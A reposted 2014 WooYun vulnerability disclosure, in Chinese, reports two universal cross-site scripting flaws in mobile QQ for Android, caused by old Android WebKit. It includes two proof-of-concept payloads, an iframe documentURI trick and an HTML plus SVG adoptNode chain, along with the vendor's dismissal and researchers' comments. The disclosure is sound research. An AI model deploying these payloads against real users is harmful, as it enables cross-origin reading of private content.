手机QQ安卓版两处跨域问题

admin
admin
admin
140846
文章
117
评论
2015年4月26日18:42:47评论294 views字数 216阅读0分43秒阅读模式
摘要

2014-07-11: 细节已通知厂商并且等待厂商处理中
2014-07-11: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-09-04: 细节向核心白帽子及相关领域专家公开
2014-09-14: 细节向普通白帽子公开
2014-09-24: 细节向实习白帽子公开
2014-10-06: 细节向公众公开

漏洞概要 关注数(42) 关注此漏洞

缺陷编号: WooYun-2014-68174

漏洞标题: 手机QQ安卓版两处跨域问题 手机QQ安卓版两处跨域问题

相关厂商: 腾讯

漏洞作者: 瘦蛟舞手机QQ安卓版两处跨域问题

提交时间: 2014-07-11 14:15

公开时间: 2014-10-06 14:16

漏洞类型: 用户敏感数据泄漏

危害等级: 中

自评Rank: 10

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 手机应用 android安全

8人收藏

漏洞详情

披露状态:

2014-07-11: 细节已通知厂商并且等待厂商处理中
2014-07-11: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-09-04: 细节向核心白帽子及相关领域专家公开
2014-09-14: 细节向普通白帽子公开
2014-09-24: 细节向实习白帽子公开
2014-10-06: 细节向公众公开

简要描述:

手机qq安卓版两处跨域问题

详细说明:

POC1

code 区域 
<body> 
 
 <script> 
 
 i = document.body.appendChild(document.createElement("iframe")); 
 
 i.src = "http://**.**.**.**"; 
 
 i.onload = function() 
 
 { 
 
 document.documentURI = "javascript://**.**.**.**/%0D%0Aalert('OH HAI ' + location)"; 
 i.contentWindow.location = ""; 
 
 } 
 
 </script> 
 
 </body>

手机QQ安卓版两处跨域问题

漏洞证明:

POC2

test.html

code 区域 
<head>
 <script>
 main = function()
 {
  specialFrame = document.body.appendChild(document.createElement("iframe"));
 
  document.adoptNode(specialFrame);
  document.implementation.createHTMLDocument().adoptNode(specialFrame);
 
  specialFrame.contentWindow.location = "http://**.**.**.**/";
 
  interval1 = setInterval(function() {
   if (specialFrame.contentDocument)
    return;
   clearInterval(interval1);
 
   specialFrame.src = "javascript:alert(document.body.innerHTML)";
 
   uxssFrame = document.body.appendChild(document.createElement("iframe"));
   uxssFrame.src = "test.svg";
  }, 100);
 }
 </script>
 </head>
 <body onload="main()"></body>

test.svg

code 区域 
<svg xmlns="http://**.**.**.**/2000/svg">
 
 <script>
 
 svg = document.documentElement;
 
 frame = svg.appendChild(document.createElementNS("http://**.**.**.**/1999/xhtml", "iframe"));
 
 frame.contentWindow.onunload = function() {
 
  svg.appendChild(top.specialFrame);
 
 }
 
 </script> 
 
 <element param="1" param="2"/>
 
 </svg>

手机QQ安卓版两处跨域问题

修复方案:

求解决方案

版权声明:转载请注明来源 瘦蛟舞@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-06 14:16

厂商回复:

非常感谢您的报告,此问题属于andriod webkit的漏洞,请尽量使用最新版的andriod系统。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-07-11 14:28 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    呵呵。。。。。 果断忽略,,

  2. 2014-07-11 14:30 | 瘦蛟舞 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    1

    @mango 这个无所谓,希望他们能反馈下解决方案。

  3. 2014-07-11 14:33 | xsser 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    0

    @瘦蛟舞 安卓的内核问题吧 升级?

  4. 2014-07-11 14:34 | 瘦蛟舞 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    1

    @xsser android组件问题,主流手机浏览器都已经解决。 感觉这种高安装量的客户端和浏览器类应用必须解决这个。

  5. 2014-07-11 14:37 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了,跪着也要...)

    1

    前排出售瓜子

  6. 2014-07-11 14:49 | xsser 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    1

    @瘦蛟舞 欢迎下次来众测

  7. 2014-07-11 14:50 | 瘦蛟舞 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    0

    @xsser 已经和301混熟了。。。

  8. 2014-07-11 15:19 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    @xsser @瘦蛟舞 放心绝对忽略。。。我提交过了。。。全部给我忽略了。。。连微信都忽略了。。。草!

  9. 2014-07-11 15:19 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    @瘦蛟舞 解决方案我给过他们了

  10. 2014-07-11 15:20 | zeracker 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

    0

    洞主是个好人。

  11. 2014-07-11 15:30 | xsser 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    0

    @mango 呵呵

  12. 2014-07-11 15:42 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了,跪着也要...)

    0

    @mango 你跟他一样?

  13. 2014-07-11 15:44 | Ton7BrEak ( 普通白帽子 | Rank:330 漏洞数:70 | ☁ 我要继续努力!)

    0

    mark 等更新,看厂商怎么回复

  14. 2014-07-11 15:50 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    0

    洞主是个好人。

  15. 2014-07-11 16:07 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    @xsser - - 你让我怎么理解这两个字!!!

  16. 2014-07-11 18:31 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    0

    @mango 呵呵

  17. 2014-07-11 19:40 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    0

    @mango 呵呵 不来我乌云提交的都是250

  18. 2014-07-11 20:59 | 超威蓝猫 ( 核心白帽子 | Rank:1133 漏洞数:122 | STEAM_0:0:55968383)

    1

    又有人要喷"明明公开了我还看不到"  :)

  19. 2014-07-12 08:43 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    0

    @超威蓝猫 新来的求为什么我看不见、、、

  20. 2014-07-12 08:50 | 超威蓝猫 ( 核心白帽子 | Rank:1133 漏洞数:122 | STEAM_0:0:55968383)

    0

    @Ev1l 是呀我也看不见 手机QQ安卓版两处跨域问题

  21. 2014-07-12 09:14 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    0

    @超威蓝猫 ///大神你别笑话我了、为什么啊

  22. 2014-07-12 21:43 | warning3 ( 实习白帽子 | Rank:40 漏洞数:6 | 巨人背后的安全专家,保障客户业务顺畅运行)

    1

    @瘦蛟舞 这种问题基本上除了那些自有内核的浏览器APP改了,因为是系统webkit的问题,其他大量用的webview的APP都会被影响,包括微信、来往、易信、微博等等,你也别用老版本的android了,你要是用2.3的android来测漏洞,什么疼的洞都有,app无辜躺枪。所以赶紧用4.4的来

  23. 2014-07-12 21:45 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    @warning3 4.0 4.2 都有

  24. 2014-07-12 21:56 | warning3 ( 实习白帽子 | Rank:40 漏洞数:6 | 巨人背后的安全专家,保障客户业务顺畅运行)

    0

    @mango 4.3也有啊,4.4就没了,你可以给google报,这是android的问题。就比如说你不能因为master key漏洞app能重打包绕过签名,就说是app的漏洞吧。APP能修复的系统问题自然去修复的好,但是这个问题要修复,至少得动很多,包括国外众多知名app都会被影响也没去修复,你也可以给facebook、给twitter报,只是人家忽略一下而已。

  25. 2014-07-12 22:09 | 瘦蛟舞 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    0

    @warning3 android基本一个手机一个系统用到换手机。。kitkat以前都会受影响。。现在占有率最高的是jelly bean了。

  26. 2014-07-12 22:10 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    1

    @瘦蛟舞 表示直接换苹果得了。。。不过今天也爆了苹果数据泄漏

  27. 2014-07-12 22:12 | 瘦蛟舞 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    0

    @Ev1l 你和evil啥关系?

  28. 2014-07-12 22:12 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    0

    @瘦蛟舞 额、、、你认为呢,基本没啥关系,我就是个小白。

  29. 2014-07-16 16:58 | 无花果 ( 路人 | Rank:2 漏洞数:1 )

    0

    @mango 乌云给忽略了怎么破?!!

  30. 2014-07-16 17:11 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    @无花果 都忽略了

  31. 2014-07-20 10:44 | warning3 ( 实习白帽子 | Rank:40 漏洞数:6 | 巨人背后的安全专家,保障客户业务顺畅运行)

    0

    @mango @瘦蛟舞 如果不忽略,那也可以报个手机qq master key漏洞伪造包的问题,哈哈

  32. 2014-07-20 15:12 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    @warning3 哈哈~ 求案例~

  33. 2014-07-25 08:23 | 无花果 ( 路人 | Rank:2 漏洞数:1 )

    0

    @mango 塞班s60飘过无压力!!

  34. 2014-07-28 18:30 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    你这第一个是微信吧 - -

  35. 2014-07-28 18:39 | 瘦蛟舞 手机QQ安卓版两处跨域问题 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    0

    @mango 少侠好眼力。。

  36. 2014-07-28 20:22 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    @瘦蛟舞 = = 我就说么。。。QQ那早测试过了。。

  37. 2015-02-04 19:10 | 我是小号6 ( 实习白帽子 | Rank:46 漏洞数:29 )

    0

    POC是怎么利用的呢?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin